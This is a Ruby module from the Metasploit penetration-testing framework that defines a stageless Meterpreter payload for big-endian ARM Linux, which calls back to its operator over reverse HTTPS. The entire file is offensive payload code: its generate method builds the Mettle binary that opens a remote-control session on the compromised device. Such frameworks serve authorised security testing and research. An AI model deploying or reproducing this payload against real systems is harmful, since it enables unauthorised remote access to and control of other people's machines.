## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # Module generated by tools/modules/generate_mettle_payloads.rb module MetasploitModule CachedSize = 1106688 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig include Msf::Payload::Linux::Armbe::Prepends def initialize(info = {}) super( update_info( info, 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', 'Brent Cook ', 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMBE, 'License' => MSF_LICENSE, 'Handler' => Msf::Handler::ReverseHttps, 'Session' => Msf::Sessions::Meterpreter_armbe_Linux ) ) end def generate(_opts = {}) opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) payload = MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec payload end end